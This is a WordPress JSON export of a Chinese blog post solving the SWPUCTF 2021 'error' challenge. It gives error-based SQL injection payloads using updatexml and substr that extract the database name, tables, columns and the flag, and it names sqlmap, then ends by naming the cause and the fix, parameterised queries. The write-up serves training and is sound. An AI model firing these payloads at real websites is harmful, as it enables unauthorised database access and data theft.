{"id":1116,"date":"2025-01-18T23:22:35","date_gmt":"2025-01-18T15:22:35","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=1116"},"modified":"2025-01-18T23:22:37","modified_gmt":"2025-01-18T15:22:37","slug":"swpuctf-2021-%e6%96%b0%e7%94%9f%e8%b5%9berror","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/01\/18\/swpuctf-2021-%e6%96%b0%e7%94%9f%e8%b5%9berror\/","title":{"rendered":"SWPUCTF 2021 \u65b0\u751f\u8d5berror"},"content":{"rendered":"<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125200051.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125200051.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20241125200051.png\"><\/div><br \/>\n\u5c1d\u8bd5\u8f93\u5165 \u2018<br \/>\n\u53d1\u73b0\u662fget\u4f20\u53c2<br \/>\n\u5e76\u4e14\u662f\u5b57\u7b26\u578b<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125200158.png\" alt=\"Pasted image 20241125200158.png\"><\/p>\n<p>\u4f7f\u7528\u62a5\u9519\u6ce8\u5165<br \/>\n\u67e5\u5f53\u524d\u6570\u636e\u5e93\u540d<br \/>\n?id=%27 and  updatexml(1,concat(&#8216;~&#8217;,database(),&#8217;~&#8217;),3) %23<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125201014.png\" alt=\"Pasted image 20241125201014.png\"><\/p>\n<p>\u67e5\u8868\u540d<br \/>\n?id=%27 and  updatexml(1,concat(&#8216;~&#8217;,(select 
group_concat(table_name) from information_schema.tables where table_schema=database()),&#8217;~&#8217;),3) %23<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125201244.png\" alt=\"Pasted image 20241125201244.png\"><\/p>\n<p>\u67e5\u5b57\u6bb5<br \/>\n?id=%27 and  updatexml(1,concat(&#8216;~&#8217;,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#8217;test_tb&#8217;),&#8217;~&#8217;),3) %23<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125201413.png\" alt=\"Pasted image 20241125201413.png\"><\/p>\n<p>\u67e5\u6570\u636e<br \/>\n?id=%27 and  updatexml(1,concat(&#8216;~&#8217;,(select group_concat(flag,id) from test_db.test_tb),&#8217;~&#8217;),3) %23<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125201641.png\" alt=\"Pasted image 20241125201641.png\"><\/p>\n<p>\u4f7f\u7528substr\u51fd\u6570\u622a\u53d6\u5b57\u6bb5<br \/>\n?id=%27 and  updatexml(1,concat(&#8216;~&#8217;,(select substr(group_concat(flag,id),22,32) from test_db.test_tb),&#8217;~&#8217;),3) %23<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125202321.png\" alt=\"Pasted image 20241125202321.png\"><\/p>\n<p>\u62fc\u63a5flag<br \/>\nNSSCTF{f655bfab-5e7f-40f2-8136-b3a5c08a7694}<\/p>\n<p>\u6216\u8005\u4f7f\u7528sqlmap<br \/>\n\u542f\u52a8\u6307\u4ee4\uff1a<br \/>\npython sqlmap.py -h\uff08-h \u4ec5\u663e\u793a\u5e2e\u52a9\u4fe1\u606f\uff09<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241125202627.png\" alt=\"Pasted image 20241125202627.png\"><\/p>\n<h3>\u603b\u7ed3<\/h3>\n<p>\u62a5\u9519\u6ce8\u5165<br \/>\nsubstr\u622a\u53d6\u51fd\u6570<br \/>\nsqlmap\u5de5\u5177\u7684\u4f7f\u7528<br \/>\n\u6210\u56e0\uff1aid \u53c2\u6570\u76f4\u63a5\u62fc\u63a5\u8fdb SQL \u8bed\u53e5\uff0c\u4e14\u6570\u636e\u5e93\u62a5\u9519\u56de\u663e\u5230\u9875\u9762<br \/>\n\u9632\u5fa1\uff1a\u4f7f\u7528\u53c2\u6570\u5316\u67e5\u8be2\uff0c\u5e76\u5173\u95ed\u62a5\u9519\u56de\u663e<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5c1d\u8bd5\u8f93\u5165 \u2018 
\u53d1\u73b0\u662fget\u4f20\u53c2 \u5e76\u4e14\u662f\u5b57\u7b26\u578b \u4f7f\u7528\u62a5\u9519\u6ce8\u5165 \u67e5\u5f53\u524d\u6570\u636e\u5e93\u540d ?id=%27 and updat [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,22,23],"tags":[42],"class_list":["post-1116","post","type-post","status-publish","format-standard","hentry","category-ctf","category-ctf-web","category-nssctf","tag-42"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1116","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=1116"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1116\/revisions"}],"predecessor-version":[{"id":1117,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1116\/revisions\/1117"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=1116"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=1116"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=1116"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}